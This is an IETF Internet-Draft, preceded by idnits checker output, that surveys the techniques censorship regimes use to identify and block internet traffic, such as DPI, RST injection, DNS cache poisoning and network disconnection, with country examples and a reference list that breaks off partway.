idnits 2.17.1 draft-hall-censorship-tech-01.txt: Checking boilerplate required by RFC 5378 and the IETF Trust (see https://trustee.ietf.org/license-info): ---------------------------------------------------------------------------- No issues found here. Checking nits according to https://www.ietf.org/id-info/1id-guidelines.txt: ---------------------------------------------------------------------------- No issues found here. Checking nits according to https://www.ietf.org/id-info/checklist : ---------------------------------------------------------------------------- ** The document seems to lack a Security Considerations section. ** The document seems to lack an IANA Considerations section. (See Section 2.2 of https://www.ietf.org/id-info/checklist for how to handle the case when there are no actions for IANA.) ** The document seems to lack separate sections for Informative/Normative References. All references will be assumed normative when checking for downward references. == There are 1 instance of lines with non-RFC6890-compliant IPv4 addresses in the document. If these are example addresses, they should be changed. Miscellaneous warnings: ---------------------------------------------------------------------------- == The copyright year in the IETF Trust and authors Copyright Line does not match the current year -- The document date (April 28, 2015) is 3286 days in the past. Is this intentional? Checking references for intended status: Informational ---------------------------------------------------------------------------- No issues found here. Summary: 3 errors (**), 0 flaws (~~), 2 warnings (==), 1 comment (--). Run idnits with the --verbose option for more detailed information about the items above. -------------------------------------------------------------------------------- 2 NETWORK WORKING GROUP J. Hall 3 Internet-Draft CDT 4 Intended status: Informational M. Aaron 5 Expires: October 30, 2015 CU Boulder 6 B. Jones 7 GA Tech 8 April 28, 2015 10 A Survey of Worldwide Censorship Techniques 11 draft-hall-censorship-tech-01 13 Abstract 15 This document describes the technical mechanisms used by censorship 16 regimes around the world to block or degrade internet traffic. It 17 aims to make designers, implementers, and users of Internet protocols 18 aware of the properties being exploited and mechanisms used to censor 19 end-user access to information. This document makes no suggestions 20 on individual protocol considerations, and is purely informational, 21 intended to be a reference. 23 Status of this Memo 25 This Internet-Draft is submitted in full conformance with the 26 provisions of BCP 78 and BCP 79. 28 Internet-Drafts are working documents of the Internet Engineering 29 Task Force (IETF). Note that other groups may also distribute 30 working documents as Internet-Drafts. The list of current Internet- 31 Drafts is at http://datatracker.ietf.org/drafts/current/. 33 Internet-Drafts are draft documents valid for a maximum of six months 34 and may be updated, replaced, or obsoleted by other documents at any 35 time. It is inappropriate to use Internet-Drafts as reference 36 material or to cite them other than as "work in progress." 38 This Internet-Draft will expire on October 30, 2015. 40 Copyright Notice 42 Copyright (c) 2015 IETF Trust and the persons identified as the 43 document authors. All rights reserved. 45 This document is subject to BCP 78 and the IETF Trust's Legal 46 Provisions Relating to IETF Documents 47 (http://trustee.ietf.org/license-info) in effect on the date of 48 publication of this document. Please review these documents 49 carefully, as they describe your rights and restrictions with respect 50 to this document. Code Components extracted from this document must 51 include Simplified BSD License text as described in Section 4.e of 52 the Trust Legal Provisions and are provided without warranty as 53 described in the Simplified BSD License. 55 Table of Contents 57 1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . 3 58 2. Technical Aggregation . . . . . . . . . . . . . . . . . . . . 4 59 3. Technical Identification . . . . . . . . . . . . . . . . . . . 5 60 3.1. Points of Control . . . . . . . . . . . . . . . . . . . . 5 61 3.2. Application Layer . . . . . . . . . . . . . . . . . . . . 6 62 3.2.1. HTTP Request Header Identification . . . . . . . . . . 6 63 3.2.2. HTTP Response Header Identification . . . . . . . . . 6 64 3.2.3. Instrumenting Content Providers . . . . . . . . . . . 7 65 3.2.4. Deep Packet Inspection (DPI) Identification . . . . . 8 66 3.3. Transport Layer . . . . . . . . . . . . . . . . . . . . . 9 67 3.3.1. TCP/IP Header Identification . . . . . . . . . . . . . 9 68 3.3.2. Protocol Identification . . . . . . . . . . . . . . . 10 69 4. Technical Prevention . . . . . . . . . . . . . . . . . . . . . 12 70 4.1. Packet Dropping . . . . . . . . . . . . . . . . . . . . . 12 71 4.2. RST Packet Injection . . . . . . . . . . . . . . . . . . . 12 72 4.3. DNS Cache Poisoning . . . . . . . . . . . . . . . . . . . 13 73 4.4. Distributed Denial of Service (DDoS) . . . . . . . . . . . 14 74 4.5. Network Disconnection or Adversarial Route Announcement . 15 75 5. Non-Technical Aggregation . . . . . . . . . . . . . . . . . . 16 76 6. Non-Technical Prevention . . . . . . . . . . . . . . . . . . . 17 77 6.1. Self Censorship . . . . . . . . . . . . . . . . . . . . . 17 78 6.2. Domain Name Reallocation . . . . . . . . . . . . . . . . . 17 79 6.3. Server Takedown . . . . . . . . . . . . . . . . . . . . . 17 80 7. References . . . . . . . . . . . . . . . . . . . . . . . . . . 18 81 Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . . 24 83 1. Introduction 85 This document describes the technical mechanisms used by censorship 86 regimes around the world to block or degrade internet traffic. To 87 that end, we describe three elements of Internet censorship: 88 aggregation, identification, and prevention. Aggregation is the 89 process by which censors determine what they should block, i.e. they 90 decide to block a list of pornographic websites. Identification is 91 the process by which censors determine whether content is blocked, 92 i.e. the censor blocks all webpages containing "sex" in the title. 93 Prevention is the process by which the censor intercedes in 94 communication and prevents access to censored materials. 96 2. Technical Aggregation 98 Aggregation is the process of figuring out what censors would like to 99 block. Generally, censors aggregate "to block" information in three 100 possible sorts of blacklists: Keyword, Domain Name, or IP. Keyword 101 and Domain Name blocking take place at the application level (e.g. 102 HTTP), whereas IP blocking tends to take place in the TCP/IP header. 103 The mechanisms for building up these blacklists are varied. Many 104 times private industries that sell "content control" software, such 105 as SmartFilter, provide their services to nations which can then pick 106 from broad categories, such as gambling or pornography, that they 107 would like to block [1]. In these cases, the private services embark 108 on an attempt to label every semi-questionable website as to allow 109 for this metatag blocking. Countries that are more interested in 110 retaining specific political control, a desire which requires swift 111 and decisive action, often have ministries or organizations, such as 112 the Ministry of Industry and Information Technology in China or the 113 Ministry of Culture and Islamic Guidance in Iran, which maintain 114 their own blacklists. 116 3. Technical Identification 118 3.1. Points of Control 120 Digital censorship, necessarily, takes place over a network. Network 121 design gives censors a number of different points-of-control where 122 they can identify the content they are interested in filtering. An 123 important aspect of pervasive technical interception is the necessity 124 to rely on software or hardware to intercept the content the censor 125 is interested in. This requirement, the need to have the 126 interception mechanism located somewhere, logically or physically, 127 implicates four general points-of-control: 129 o Internet Backbone: If a censor controls the gateways into a 130 region, they can filter undesirable traffic that is traveling into 131 and out of the region by sniffing and mirroring at the relevant 132 exchange points. Censorship at this point-of-control is most 133 effective at controlling the flow of information between a region 134 and the rest of the internet, but is ineffective at identifying 135 content traveling between the users within a region. 137 o Internet Service Providers: Internet Service Providers are perhaps 138 the most natural point-of-control. They have a benefit of being 139 easily enumerable by a censor paired with the ability to identify 140 the regional and international traffic of all their users. The 141 censor's filtration mechanisms can be placed on an ISP via 142 governmental mandates, ownership, or voluntary/coercive influence. 144 o Institutions: Private institutions such as corporations, schools, 145 and cyber cafes can put filtration mechanisms in place. These 146 mechanisms are occasionally at the request of a censor, but are 147 more often implemented to help achieve institutional goals, such 148 as to prevent the viewing of pornography on school computers. 150 o Personal Devices: Censors can mandate censorship software be 151 installed on the device level. This has many disadvantages in 152 terms of scalability, ease-of-circumvention, and operating system 153 requirements. The emergence of mobile devices exacerbate these 154 feasibility problems. 156 At all levels of the network hierarchy, the filtration mechanisms 157 used to detect undesirable traffic are essentially the same: a censor 158 sniffs transmitting packets and identifies undesirable content, and 159 then uses a blocking or shaping mechanism to prevent or degrade 160 access. Identification of undesirable traffic can occur at the 161 application, transport, or network layer of the IP stack. Censors 162 are almost always concerned with web traffic, so the relevant 163 protocols tend to be filtered in predictable ways. For example, a 164 subversive image would always make it past a keyword filter, but the 165 IP address of the site serving the image may be blacklisted when 166 identified as a provider of undesirable content. 168 3.2. Application Layer 170 3.2.1. HTTP Request Header Identification 172 An HTTP header contains a lot of useful information for traffic 173 identification; although host is the only required field in an HTTP 174 request header, an HTTP method field is necessary to do anything 175 useful. As such, the method and host fields are the two fields used 176 most often for ubiquitous censorship. A censor can sniff traffic and 177 identify a specific domain name (host) and usually a page name (GET 178 /page) as well. This identification technique is usually paired with 179 TCP/IP header identification (see Section 3.3.1) for a more robust 180 method. 182 Tradeoffs: Request Identification is a technically straight-forward 183 identification method that can be easily implemented at the Backbone 184 or ISP level. The hardware needed for this sort of identification is 185 cheap and easy-to-acquire, making it desirable when budget and scope 186 are a concern. HTTPS will encrypt the relevant request and response 187 fields, so pairing with TCP/IP identification (see Section 3.3.1) is 188 necessary for filtering of HTTPS. 190 Empirical Examples: Studies exploring censorship mechanisms have 191 found evidence of HTTP header/ URL filtering in many countries, 192 including Bangladesh, Bahrain, China, India, Iran, Malaysia, 193 Pakistan, Russia, Saudi Arabia, South Korea, Thailand, and Turkey 194 [58][59][60]. Commercial technologies such as the McAfee SmartFilter 195 and NetSweeper are often purchased by censors [2]. These commercial 196 technologies use a combination of HTTP Request Identification and 197 TCP/IP Header Identification to filter specific URLs. Dalek et al. 198 and Jones et al. identified the use of these products in the wild 199 [2][61]. 201 3.2.2. HTTP Response Header Identification 203 While HTTP Request Header Identification relies on the information 204 contained in the HTTP request from client to server, response 205 identification uses information sent in response by the server to 206 client to identify undesirable content. 208 Tradeoffs: As with HTTP Request Header Identification, the techniques 209 used to identify HTTP traffic are well-known, cheap, and relatively 210 easy to implement, but is made useless by HTTPS, because the response 211 in HTTPS is encrypted, including headers. 213 The response fields are also less helpful for identifying content 214 than request fields, as Server could easily be identified using HTTP 215 Request Header identification, and Via is rarely relevant. HTTP 216 Response censorship mechanisms normally let the first n packets 217 through while the mirrored traffic is being processed; this may allow 218 some content through and the user may be able to detect that the 219 censor is actively interfering with undesirable content. 221 Empirical Examples: In 2009, Jong Park et al. at the University of 222 New Mexico demonstrated that the Great Firewall of China (GFW) used 223 this technique [3]. However, Jong Park et al. found that the GFW 224 discontinued this practice during the course of the study. Due to 225 the overlap in HTTP response filtering and keyword filtering (see 226 Section 3.2.3), it is likely that most censors rely on keyword 227 filtering over TCP streams instead of HTTP response filtering. 229 3.2.3. Instrumenting Content Providers 231 In addition to censorship by the state, many governments pressure 232 content providers to censor themselves. Due to the extensive reach 233 of government censorship, we need to define content provider as any 234 service that provides utility to users, including everything from web 235 sites to locally installed programs. The defining factor of keyword 236 identification by content providers is the choice of content 237 providers to detect restricted terms on their platform. The terms to 238 look for may be provided by the government or the content provider 239 may be expected to come up with their own list. 241 Tradeoffs: By instrumenting content providers to identify restricted 242 content, the censor can gain new information at the cost of political 243 capital with the companies it forces or encourages to participate in 244 censorship. For example, the censor can gain insight about the 245 content of encrypted traffic by coercing web sites to identify 246 restricted content, but this may drive away potential investment. 247 Coercing content providers may encourage self censorship, an 248 additional advantage for censors. The tradeoffs for instrumenting 249 content providers are highly dependent on the content provider and 250 the requested assistance. 252 Empirical Examples: Researchers have discovered keyword 253 identification by content providers on platforms ranging from instant 254 messaging applications [63] to search engines [62][4][6][7][8]. To 255 demonstrate the prevalence of this type of keyword identification, we 256 look to search engine censorship. 258 Search engine censorship demonstrates keyword identification by 259 content providers and can be regional or worldwide. Implementation 260 is occasionally voluntary, but normally is based on laws and 261 regulations of the country a search engine is operating in. The 262 keyword blacklists are most likely maintained by the search engine 263 provider. China requires search engine providers to "voluntarily" 264 maintain search term blacklists to acquire/keep an Internet content 265 provider (ICP) license [4]. It is clear these blacklists are 266 maintained by each search engine provider based on the slight 267 variations in the intercepted searches [5][6]. The United Kingdom 268 has been pushing search engines to self censor with the threat of 269 litigation if they don't do it themselves: Google and Microsoft have 270 agreed to block more than 100,00 queries in U.K. to help combat abuse 271 [7][8]. 273 Depending on the output, search engine keyword identification may be 274 difficult or easy to detect. In some cases specialized or blank 275 results provide a trivial enumeration mechanism, but more subtle 276 censorship can be difficult to detect. In February, Microsoft's 277 search engine, Bing, was accussed of censoring Chinese content 278 outside of China [62] because Bing returned different results for 279 censored terms in Chinese and English. However, it is possible that 280 censorship of the largest base of Chinese search users, China, biased 281 Bing's results so that the more popular results in China (the 282 uncensored results) were also more popular for Chinese speakers 283 outside of China. 285 3.2.4. Deep Packet Inspection (DPI) Identification 287 Deep Packet Inspection has become computationally feasible as a 288 censorship mechanism in the past 5 years [9]. Unlike other 289 techniques, DPI reassembles network flows to examine the application 290 "data" section, as opposed to only the header, and is therefore often 291 used for keyword identification. DPI also differs from other 292 identification technologies because it can leverage additional packet 293 and flow characteristics, i.e. packet sizes and timings, to identify 294 content. To prevent substantial quality of service (QoS) impacts, 295 DPI normally analyzes a copy of data while the original packets 296 continue to be routed. Typically, the traffic is split using either 297 a mirror switch or fiber splitter, and analyzed on a cluster of 298 machines running Intrusion Detection Systems (IDS) configured for 299 censorship. 301 Tradeoffs: DPI is one of the most expensive identification mechanisms 302 and can have a large QoS impact [10]. When used as a keyword filter 303 for TCP flows, DPI systems can cause also major overblocking 304 problems. Like other techniques, DPI is less useful against 305 encrypted data, though DPI can leverage unencrypted elements of an 306 encrypted data flow (e.g., the Server Name Indicator (SNI) sent in 307 the clear for TLS) or statistical information about an encrypted flow 308 (e.g., video takes more bandwidth than audio or textual forms of 309 communication) to identify traffic. 311 Despite these problems, DPI is the most powerful identification 312 method and is widely used in practice. The Great Firewall of China 313 (GFW), the largest censorship system in the world, uses DPI to 314 identify restricted content over HTTP and DNS and inject TCP RSTs and 315 bad DNS responses, respectively, into connections [3][64][65]. 317 Empirical Evidence: Several studies have found evidence of DPI being 318 used to censor content and tools. Clayton et al. Crandal et al., 319 Anonymous, and Khattak et al., all explored the GFW and Khattak et 320 al. even probed the firewall to discover implementation details like 321 how much state it stores [3][64][65][66]. The Tor project claims 322 that China, Iran, Ethiopia, and others must being using DPI to block 323 the obsf2 protocol [11]. Malaysia has been accused of using targeted 324 DPI, paired with DDoS, to identify and subsequently knockout pro- 325 opposition material [12]. It also seems likely that organizations 326 not so worried about blocking content in real-time could use DPI to 327 sort and categorically search gathered traffic using technologies 328 such as NarusInsight [13]. 330 3.3. Transport Layer 332 3.3.1. TCP/IP Header Identification 334 TCP/IP Header Identification is the most pervasive, reliable, and 335 predictable type of identification. TCP/IP headers contain a few 336 invaluable pieces of information that must be transparent for traffic 337 to be successfully routed: destination and source IP address and 338 port. Destination and Source IP are doubly useful, as not only does 339 it allow a censor to block undesirable content via IP blacklisting, 340 but also allows a censor to identify the IP of the user making the 341 request. Port is useful for whitelisting certain applications. 343 Trade-offs: TCP/IP identification is popular due to its simplicity, 344 availability, and robustness. 346 TCP/IP identification is trivial to implement, but is difficult to 347 implement in backbone or ISP routers at scale, and is therefore 348 typically implemented with DPI. Blacklisting an IP is equivalent to 349 installing a /32 route on a router and due to limited flow table 350 space, this cannot scale beyond a few thousand IPs at most. IP 351 blocking is also relatively crude, leading to overblocking, and 352 cannot deal with some services like Content Distribution Networks 353 (CDN), that host content at hundreds or thousands of IP addresses. 354 Despite these limitations, IP blocking is extremely effective because 355 the user needs to proxy their traffic through another destination to 356 circumvent this type of identification. 358 Port-blocking is generally not useful because many types of content 359 share the same port and it is possible for censored applications to 360 change their port. For example, most HTTP traffic goes over port 80, 361 so the censor cannot differentiate between restricted and allowed 362 content solely on the basis of port. Port whitelisting is 363 occasionally used, where a censor limits communication to approved 364 ports, such as 80 for HTTP traffic and is most effective when used in 365 conjuction with other identification mechanisms. For example, a 366 censor could block the default HTTPS port, port 443, thereby forcing 367 most users to fall back to HTTP. 369 3.3.2. Protocol Identification 371 Censors sometimes identify entire protocols to be blocked using a 372 variety of traffic characteristics. For example, Iran degrades the 373 performance of HTTPS traffic, a procotol that prevents further 374 analysis, to encourage users to switch to HTTP, a protocol that they 375 can analyze [60]. A simple protocol identification would be to 376 recognize all TCP traffic over port 443 as HTTPS, but more 377 sophisticated analysis of the statistical properties of payload data 378 and flow behavior, would be more effective, even when port 443 is not 379 used [14][15]. 381 If censors can detect circumvention tools, they can block them, so 382 censors like China are extremely interested in identifying the 383 protocols for censorship circumvention tools. In recent years, this 384 has devolved into an arms race between censors and circumvention tool 385 developers. As part of this arms race, China developed an extremely 386 effective protocol identification technique that researchers call 387 active probing or active scanning. 389 In active probing, the censor determines whether hosts are running a 390 circumvention protocol by trying to initiate communication using the 391 circumvention protocol. If the host and the censor successfully 392 negotiate a connection, then the censor conclusively knows that host 393 is running a circumvention tool. China has used active scanning to 394 great effect to block Tor [17]. 396 Trade-offs: Protocol Identification necessarily only provides insight 397 into the way information is traveling, and not the information 398 itself. 400 Protocol identification is useful for detecting and blocking 401 circumvention tools, like Tor, or traffic that is difficult to 402 analyze, like VoIP or SSL, because the censor can assume that this 403 traffic should be blocked. However, this can lead to overblocking 404 problems when used with popular protocols. These methods are 405 expensive, both computationally and financially, due to the use of 406 statistical analysis, and can be ineffective due to its imprecise 407 nature. 409 Empirical Examples: Protocol identification can be easy to detect if 410 it is conducted in real time and only a particular protocol is 411 blocked, but some types of protocol identification, like active 412 scanning, are much more difficult to detect. Protocol identification 413 has been used by Iran to identify and throttle SSH traffic to make it 414 unusable [16] and by China to identify and block Tor relays [17]. 415 Protocol Identification has also been used for traffic management, 416 such as the 2007 case where Comcast in the United States used RST 417 injection to interrupt BitTorrent Traffic [17]. 419 4. Technical Prevention 421 4.1. Packet Dropping 423 Packet dropping is a simple mechanism to prevent undesirable traffic. 424 The censor identifies undesirable traffic and chooses to not properly 425 forward any packets it sees associated with the traversing 426 undesirable traffic instead of following a normal routing protocol. 427 This can be paired with any of the previously described mechanisms so 428 long as the censor knows the user must route traffic through a 429 controlled router. 431 Trade offs: Packet Dropping is most successful when every traversing 432 packet has transparent information linked to undesirable content, 433 such as a Destination IP. One downside Packet Dropping suffers from 434 is the necessity of overblocking all content from otherwise allowable 435 IP's based on a single subversive sub-domain; blogging services and 436 github repositories are good examples. China famously dropped all 437 github packets for three days based on a single repository hosting 438 undesirable content [18]. The need to inspect every traversing 439 packet in close to real time also makes Packet Dropping somewhat 440 challenging from a QoS perspective. 442 Empirical Examples: Packet Dropping is a very common form of 443 technical prevention and lends itself to accurate detection given the 444 unique nature of the time-out requests it leaves in its wake. The 445 Great Firewall of China uses packet dropping as one of its primary 446 mechanisms of technical censorship [19]. Iran also uses Packet 447 Dropping as the mechanisms for throttling SSH [20]. These are but 448 two examples of a ubiquitous censorship practice. 450 4.2. RST Packet Injection 452 Packet injection, generally, refers to a man-in-the-middle (MITM) 453 network interference technique that spoofs packets in an established 454 traffic stream. RST packets are normally used to let one side of TCP 455 connection know the other side has stopped sending information, and 456 thus the receiver should close the connection. RST Packet Injection 457 is a specific type of packet injection attack that is used to 458 interrupt an established stream by sending RST packets to both sides 459 of a TCP connection; as each receiver thinks the other has dropped 460 the connection, the session is terminated. 462 Trade-offs: RST Packet Injection has a few advantages that make it 463 extremely popular is a censorship technique. RST Packet Injection is 464 an out-of-band prevention mechanism, allowing the avoidance of the 465 the QoS bottleneck one can encounter with inline techniques such as 466 Packet Dropping. This out-of-band property allows a censor to 467 inspect a copy of the information, usually mirrored by an optical 468 splitter, making it an ideal pairing for DPI and Protocol 469 Identification [21]. RST Packet Injection also has the advantage of 470 only requiring one of the two endpoints to accept the spoofed packet 471 for the connection to be interrupted [22]. The difficult part of RST 472 Packet Injection is spoofing "enough" correct information to ensure 473 one end-point accepts a RST packet as legitimate; this generally 474 implies a correct IP, port, and (TCP) sequence number. Sequence 475 number is the hardest to get correct, as RFC 793 specifies an RST 476 Packet should be in-sequence to be accepted, although the RFC also 477 recommends allowing in-window packets as "good enough" [23]. This 478 in-window recommendation is important, as if it is implement it 479 allows for successful Blind RST Injection attacks [24]. When in- 480 window sequencing is allowed, It is trivial to conduct a Blind RST 481 Injection, a blind injection implies the censor doesn't know any 482 sensitive (encrypted) sequencing information about the TCP stream 483 they are injecting into, they can simply enumerate the ~70000 484 possible windows; this is particularly useful for interrupting 485 encrypted/obfuscated protocols such as SSH or Tor. RST Packet 486 Injection relies on a stateful network, making it useless against UDP 487 connections. RST Packet Injection is among the most popular 488 censorship techniques used today given its versatile nature and 489 effectiveness against all types of TCP traffic. 491 Empirical Examples: RST Packet Injection, as mentioned above, is most 492 often paired with identification techniques that require splitting, 493 such as DPI or Protocol Identification. In 2007 Comcast was accused 494 of using RST Packet Injection to interrupt traffic it identified as 495 BitTorrent [25], this later led to a US Fderal Communications 496 Commission ruling against Comcast [26]. China has also been known to 497 use RST Packet Injection for censorship purposes. This prevention is 498 especially evident in the interruption of encrypted/obfuscated 499 protocols, such as those used by Tor [27]. 501 4.3. DNS Cache Poisoning 503 DNS Cache Poisoning refers to a mechanism where a censor interferes 504 with the response sent by a DNS resolver to the requesting device by 505 injecting an alternative IP address into the response message on the 506 return path. Cache poisoning occurs after the requested site's name 507 servers resolve the request and attempt to forward the IP back to the 508 requesting device; on the return route the resolved IP is recursively 509 cached by each DNS server that initially forwarded the request. 510 During this caching process if an undesirable keyword is recognized, 511 the resolved IP is poisoned and an alternative IP is returned. These 512 alternative IP's usually direct to a nonsense domain or a warning 513 page [28]. Alternatively, Iranian censorship appears to prevent the 514 communication en-route, preventing a response from ever being sent 516 [29]. 518 Trade-offs: DNS Cache Poisoning is one of the rarer forms of 519 prevention due to a number of shortcomings. DNS Cache Poisoning 520 requires the censor to force a user to traverse a controlled DNS 521 resolver for the mechanism to be effective, it is easily circumvented 522 by a technical savvy user that opts to use alternative DNS resolvers, 523 such as the 8.8.8.8/8.8.4.4 public DNS resolvers provided by Google. 524 DNS Cache Poisoning also implies returning an incorrect IP to those 525 attempting to resolve a domain name, but the site is still 526 technically unblocked if the user has another method to acquire the 527 IP address of the desired site. Blocking overflow has also been a 528 problem, as occasionally users outside of the censors region will be 529 directed through a DNS server controlled by a censor, causing the 530 request to fail. The ease of circumvention paired with the large 531 risk of overblocking and blocking overflow make DNS Cache Poisoning a 532 partial, difficult, and less than ideal censorship mechanism. 534 Empirical Evidence: DNS Cache Poisoning, when properly implemented, 535 is easy to identify based on the shortcomings identified above. 536 Turkey relied on DNS Cache Poisoning for its country-wide block of 537 websites such Twitter and Youtube for almost week in March of 2014 538 but the ease of circumvention resulted in an increase in the 539 popularity of Twitter until Turkish ISP's implementing an IP 540 blacklist to achieve the governmental mandate [30]. To drive 541 proverbial "nail in the coffin" Turkish ISPs started hijacking all 542 requests to Google and Level 3's international DNS resolvers [31]. 543 DNS Cache Poisoning, when incorrectly implemented, has as has 544 resulted in some of the largest "censorship disasters". In January 545 2014 China started directing all requests passing through the Great 546 Fire Wall to a single domain, dongtaiwang.com, due to an improperly 547 configured DNS Cache Poisoning attempt; this incident is thought to 548 be the largest internet-service outage in history [32][33]. 549 Countries such as China, Iran, Turkey, and the United States have 550 discussed blocking entire TLDs as well, but only Iran has acted by 551 blocking all Israeli (.il) domains [34]. 553 4.4. Distributed Denial of Service (DDoS) 555 Distributed Denial of Service attacks are a common attack mechanism 556 used by "hacktivists" and black-hat hackers, but censors have used 557 DDoS in the past for a variety of reasons. There is a huge variety 558 of DDoS attacks [35], but on a high level two possible impacts tend 559 to occur; a flood attack results in the service being unusable while 560 resources are being spent to flood the service, a crash attack aims 561 to crash the service so resources can be reallocated elsewhere 562 without "releasing" the service. 564 Trade-offs: DDoS is an appealing mechanism when a censor would like 565 to prevent all access to undesirable content, instead of only access 566 in their region for a limited period of time, but this is really the 567 only uniquely beneficial feature for DDoS as a censorship technique. 568 The resources required to carry out a successful DDoS against major 569 targets are computationally expensive, usually requiring renting or 570 owning a malicious distributed platform such as a botnet, and 571 imprecise. DDoS is an incredibly crude censorship technique, and 572 appears to largely be used as a timely, easy-to-access mechanism for 573 blocking undesirable content for a limited period of time. 575 Empirical Examples: In 2012 the U.K.'s GCHQ used DDoS to temporarily 576 shutdown IRC chat rooms frequented by members of Anonymous using the 577 Syn Flood DDoS method; Syn Flood exploits the handshake used by TCP 578 to overload the victim server with so many requests that legitimate 579 traffic becomes slow or impossible [36][37]. Dissenting opinion 580 websites are frequently victims of DDoS around politically sensitive 581 events in Burma [38]. Controlling parties in Russia [39], Zimbabwe 582 [40], and Malaysia [41] have been accused of using DDoS to interrupt 583 opposition support and access during elections. 585 4.5. Network Disconnection or Adversarial Route Announcement 587 While it is perhaps the crudest of all censorship techniques, there 588 is no more effective way of making sure undesirable information isn't 589 allowed to propagate on the web than by shutting off the network. 590 The network can be logically cut off in a region when a censoring 591 body withdraws all of the Boarder Gateway Protocol (BGP) prefixes 592 routing through the censor's country. 594 Trade-offs: The impact to a network disconnection in a region is huge 595 and absolute; the censor pays for absolute control over digital 596 information with all the benefits the internet brings; this is never 597 a long-term solution for any rational censor and is normally only 598 used as a last resort in times of substantial unrest. 600 Empirical Examples: Network Disconnections tend to only happen in 601 times of substantial unrest, largely due to the huge social, 602 political, and economic impact such a move has. One of the first, 603 highly covered occurrences was with the Junta in Myanmar employing 604 Network Disconnection to help Junta forces quash a rebellion in 2007 605 [42]. China disconnected the network in the Xinjiang region during 606 unrest in 2009 in an effort to prevent the protests from spreading to 607 other regions [43]. The Arab Spring saw the the most frequent usage 608 of Network Disconnection, with events in Egypt and Libya in 2011 609 [44][45], and Syria in 2012 [46]. 611 5. Non-Technical Aggregation 613 As the name implies, sometimes manpower is the easiest way to figure 614 out which content to block. Manual Filtering differs from the common 615 tactic of building up blacklists in that is doesn't necessarily 616 target a specific IP or DNS, but instead removes or flags content. 617 Given the imprecise nature of automatic filtering, manually sorting 618 through content and flagging dissenting websites, blogs, articles and 619 other media for filtration can be an effective technique. This 620 filtration can occur on the Backbone/ISP level, China's army of 621 monitors is a good example [47]; more commonly manual filtering 622 occurs on an institutional level. (Internet Content Provider?) 623 ICP's, such as Google or Weibo, require a business license to operate 624 in China. One of the prerequisites for a business license is an 625 agreement to sign a "voluntary pledge" known as the "Public Pledge on 626 Self-discipline for the Chinese Internet Industry". The failure to " 627 energetically uphold" the pledged values can lead to the ICP's being 628 held liable for the offending content by the Chinese government [47]. 630 6. Non-Technical Prevention 632 6.1. Self Censorship 634 Self censorship is one of the most interesting and effective types of 635 censorship; a mix of Bentham's Panopticon, cultural manipulation, 636 intelligence gathering, and meatspace enforcement. Simply put, self 637 censorship is when a censor creates an atmosphere where users censor 638 themselves. This can be achieved through controlling information, 639 intimidating would-be dissidents, swaying public thought, and 640 creating apathy. Self censorship is difficult to document, as when 641 it is implemented effectively the only noticeable tracing is a lack 642 of undesirable content; instead one must look at the tools and 643 techniques used by censors to encourage self-censorship. Controlling 644 Information relies on traditional censorship techniques, or by 645 forcing all users to connect through an intranet, such as in North 646 Korea. Intimidation is often achieved through allowing internet 647 users to post "whatever they want", but arresting those who post 648 about dissenting views, this technique is incredibly common 649 [48][49][50][51][52]. A good example of swaying public thought is 650 China's "50-Cent Party", composed of somewhere between 20,000 [53] 651 and 300,000 [54] contributors who are paid to "guide public thought" 652 on local and regional issues as directed by the Ministry of Culture. 653 Creating apathy can be a side-effect of successfully controlling 654 information over time and is ideal for a censorship regime [55]. 656 6.2. Domain Name Reallocation 658 As Domain Names are resolved recursively, if a TLD deregisters a 659 domain all other DNS resolvers will be unable to properly forward and 660 cache the site. Domain name registration is only really a risk where 661 undesirable content is hosted on TLD controlled by the censoring 662 country, such as .ch or .ru [56]. 664 6.3. Server Takedown 666 Servers must have a physical location somewhere in the world. If 667 undesirable content is hosted in the censoring country the servers 668 can be physically seized or the hosting provider can be required to 669 prevent access [57]. 671 7. References 673 [1] Glanville, J., "The Big Business of Net Censorship", 674 November 2008, . 677 [2] Dalek, J., "A Method for Identifying and Confirming the Use of 678 URL Filtering Products for Censorship", October 2013 , . 681 [3] Crandall, J., "Empirical Study of a National-Scale Distributed 682 Intrusion Detection System: Backbone-Level Filtering of HTML 683 Responses in China"", June 2010 , 684 . 686 [4] Cheng, J., "Google stops Hong Kong auto-redirect as China plays 687 hardball"", June 2010, . 691 [5] Zhu, T., "An Analysis of Chinese Search Engine Filtering"", 692 July 2011 , 693 . 695 [6] Whittaker, Z., "1,168 keywords Skype uses to censor, monitor 696 its Chinese users", March 2013 , . 700 [7] News, B., "Google and Microsoft agree steps to block abuse 701 images", November 2013 , . 703 [8] Condliffe, J., "Google Announces Massive New Restrictions on 704 Child Abuse Search Terms", November 2013 , . 708 [9] Wagner, B., "Deep Packet Inspection and Internet Censorship: 709 International Convergence on an 'Integrated Technology of 710 Control'", June 2009 , . 714 [10] Porter, T., "The Perils of Deep Packet Inspection", Oct 2010, < 715 http://www.symantec.com/connect/articles/ 716 perils-deep-packet-inspection>. 718 [11] Wilde, T., "Knock Knock Knockin' on Bridges Doors", 719 January 2012, . 722 [12] Wagstaff, J., "In Malaysia, online election battles take a 723 nasty turn", May 2013, . 726 [13] EFF, T., "Hepting vs. ATand T", Updated December, 727 . 729 [14] Hjelmvik, E., "July 2010 7", Breaking and, 730 . 732 [15] Vine, S., "Technology Showcase on Traffic Classification: Why 733 Measurements and Freeform Policy Matter", May 2014, . 739 [16] Anonymous, A., "How to Bypass Comcast's Bittorrent Throttling", 740 October 2007, . 743 [17] Winter, P., "How China is Blocking Tor", April 2012, 744 . 746 [18] Anonymous, A., "GitHub blocked in China - how it happened, how 747 to get around it, and where it will take us", January 2013, . 752 [19] Ensafi, R., "Detecting Intentional Packet Drops on the Internet 753 via TCP/IP Side Channels", December 2013, 754 . 756 [20] Aryan*, A., "Internet Censorship in Iran: A First Look", 757 August 2013 , 758 . 760 [21] Weaver, S., "Detecting Forged TCP Packets", June 2009 , 761 . 763 [22] Weaver, S., "Detecting Forged TCP Packets", June 2009 , 764 . 766 [23] Weaver, S., "Detecting Forged TCP Packets", June 2009 , 767 . 769 [24] Anonymous, A., "TCP-RST Injection", June 210 , 770 . 772 [25] Schoen, S., "EFF tests agree with AP: Comcast is forging 773 packets to interfere with user traffic", October 19th,, . 777 [26] VonLohmann, F., "FCC Rules Against Comcast for BitTorrent 778 Blocking", August 3rd,, . 781 [27] Phillip Winter, S., "How China Is Blocking Tor", April 2nd,, 782 . 784 [28] DNS, V., "DNS Cache Poisoning in the People's Republic of 785 China", September 6th, . 788 [29] Aryan*, A., "Internet Censorship in Iran: A First Look", 789 August 2013 , 790 . 792 [30] Zmijewki, E., 